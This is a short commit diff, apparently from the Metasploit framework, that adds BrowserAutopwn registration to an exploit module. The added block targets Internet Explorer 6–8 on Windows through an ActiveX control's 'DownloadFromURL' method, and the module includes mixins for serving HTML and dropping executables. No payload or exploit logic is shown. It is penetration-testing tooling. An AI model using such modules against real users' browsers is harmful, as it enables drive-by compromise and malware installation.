Added BrowserAutopwn info
parent
0e475dfce1
commit
52982c0785
|
@ -13,6 +13,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
|
include Msf::Exploit::Remote::BrowserAutopwn
|
||||||
|
|
||||||
|
autopwn_info({
|
||||||
|
:ua_name => HttpClients::IE,
|
||||||
|
:ua_minver => "6.0",
|
||||||
|
:ua_maxver => "8.0",
|
||||||
|
:javascript => true,
|
||||||
|
:os_name => OperatingSystems::WINDOWS,
|
||||||
|
:rank => NormalRanking,
|
||||||
|
:classid => "{E01DF79C-BE0C-4999-9B13-B5F7B2306E9B}",
|
||||||
|
:method => "DownloadFromURL"
|
||||||
|
})
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
Loading…
Reference in New Issue